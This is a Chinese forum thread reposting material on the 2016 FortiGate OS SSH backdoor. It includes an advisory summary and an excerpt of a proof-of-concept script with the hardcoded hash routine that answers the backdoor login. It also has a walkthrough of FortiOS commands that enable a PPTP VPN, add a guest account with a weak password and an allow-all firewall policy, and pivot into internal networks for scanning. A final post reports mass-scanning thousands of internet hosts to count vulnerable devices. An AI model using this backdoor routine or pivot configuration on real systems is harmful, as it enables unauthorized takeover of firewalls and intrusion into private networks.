Board logo

标题: FortiGate OS(飞塔系统) 4.0-5.0.7 SSH 后门 [打印本页]

作者: linda    时间: 2016-1-13 23:13     标题: FortiGate OS(飞塔系统) 4.0-5.0.7 SSH 后门

漏洞编号:SSV-90378披露/发现时间:2016-01-12提交时间:2016-01-12漏洞等级:



漏洞类别:后门

CVE-ID:补充
CNNVD-ID:补充
CNVD-ID:补充
漏洞作者:未知提交者:Root


ZoomEye Dork:FortiGate影响组件:FortiGate(4.0<version<5.0.7)漏洞概要FortiGate(飞塔防火墙)采用 ASIC 加速的 UTM 解决方案,可以有效地防御网 络层和内容层的攻击。FortiGate 解决方案能够发现和消除多层的攻击,比如病 毒、蠕虫、入侵、以及 Web 恶意内容等等实时的应用,而不会导致网络性能下降。
北京时间 2016 年 1 月 12 日凌晨四点钟,国外安全研究员在 twiter 上爆料 FortiGate 防火墙存在一个后门,攻击者可以通过这个后门直接获取防火墙控制 权限。

漏洞详情贡献者 Root 共获得  0KB

漏洞概述FortiGate(飞塔防火墙)采用 ASIC 加速的 UTM 解决方案,可以有效地防御网 络层和内容层的攻击。FortiGate 解决方案能够发现和消除多层的攻击,比如病 毒、蠕虫、入侵、以及 Web 恶意内容等等实时的应用,而不会导致网络性能下降。
北京时间 2016 年 1 月 12 日凌晨四点钟,国外安全研究员在 twiter 上爆料 FortiGate 防火墙存在一个后门,攻击者可以通过这个后门直接获取防火墙控制 权限。
官方发布公告http://blog.fortinet.com/post/brief-statement-regarding-issues-found-with-fortios称不是后门,而是管理认证的问题,建议用户升级。
漏洞效果使用后门帐号,可以直接获取防火墙系统的 root 权限。
影响范围在漏洞爆发的第一时间,知道创宇漏洞情报团队在 ZoomEye 网络空间搜索引擎 上发现全球有约 6.5 万个 FortiGate 防火墙。
在ZoomEye 中我们可以看到,全球使用该防火墙最多的国家分别为美国(13633)、印度(7833)、中国(3957)、日本(2937)、韩国(2790)。
参考连接原文:https://www.sebug.net/vuldb/ssvid-90378

[ 本帖最后由 linda 于 2016-2-29 17:23 编辑 ]
作者: linda    时间: 2016-1-13 23:16     标题: SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7(POC/脚本)

原文:http://seclists.org/fulldisclosure/2016/Jan/26

From: <operator8203 () runbox com>
Date: Sat, 09 Jan 2016 14:48:01 -0500 (EST)
。。。


# Usage: ./fgt_ssh_backdoor.py <target-ip>

。。。
def custom_handler(title, instructions, prompt_list):
    n = prompt_list[0][0]
    m = hashlib.sha1()
    m.update('\x00' * 12)
    m.update(n + 'FGTAbc11*xy+Qqz27')
    m.update('\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70')
    h = 'AK1' + base64.b64encode('\x00' * 12 + m.digest())
    return [h]


def main():
  
。。。
作者: linda    时间: 2016-1-14 17:18     标题: Fortigate Firmware

https://github.com/rapid7/metasploit-framework/issues/6463

Fortigate Firmware
http://www.filewatcher.com/b/ftp/ftp.cozumnetwork.net/Fortinet/Fortigate/Fortigate_Firmware/Firmware/v5.00/V5_5.04-0.html
作者: linda    时间: 2016-2-29 17:21     标题: 飞塔SSH后门 进一步利用方法

昨天FortiGate爆了一个SSH Backdoor ,具体内容可以看这(http://tools.pwn.ren/2016/01/12/ssh-backdoor-for-fortigate-os-version-4-up-to-5-0-7.html)
那我们如何利用了?如何利用这个SSH 后门进入到内网了?好了这就是这篇文章要讲的东西。
这个后门获取到的是防火墙的root权限,就是所有防火墙的操作我们都可以做,这里我们利用防火墙的
vpn服务来进入到内网中 ,从而进行进一步渗透。
0X00 先看下用户组












Default



1



show user group




0x01开启vpn












Default



1


2


3


4


5


6


7


8


9


10


11


12


13


14


15


16


17


18


19


20


21


22


23


24


25


26


27


28


29



config vpn pptp
set status enable
set eip
192.168.200.100

set sip
192.168.200.1

set usrgrp Guest-group
end
config user local
edit
"guest"

set type password
set passwd
123456

next
end
config user group
edit
"Guest-group"

set profile
"unfiltered"

set member
"guest"

next
end
config firewall policy
edit
9

set srcintf
"wan1"

set dstintf
"internal"

set srcaddr
"all"

set dstaddr
"all"

set action accept
set schedule
"always"

set service
"ANY"

next
end




0x02 内网进一步渗透
查看路由表












Default



1



get router info routing-table all




这里已经成功连接上,并使用nmap扫描,这里记得你是防火墙root,所以你想去哪就去哪(蒙多)



【via@安全工具箱 Audit0r

作者: linda    时间: 2016-2-29 17:27     标题: 飞塔SSH后门 4900台机器样本测试报告

测试逻过程1. Censys拉取数据通过censys拉去了50页面的结果
通过
关键字
使用官方的api进行拉取,脚本如下:
2. 筛选出开放22端口的ip原始数据长度:
通过zmap进行数据筛选
最终剩下
3. 对其进行扫描通过修改原始测试脚本进行测试,添加多线程模块
使用方法:
4. 总结扫描结果是存在374台漏洞机器,大约站了原始数据的13分之一1,如果按照这个数量来计算,全网大约有5000台以上机器收到影响,将漏洞主机标注在地图上,结果大致如下:

来自为知笔记(Wiz)
转载请注明:安全工具箱 » 飞塔SSH后门 4900台机器样本测试报告




欢迎光临 中神通公司交流论坛 (http://trustcomputing.com.cn/bbs/) Powered by Discuz! 6.0.0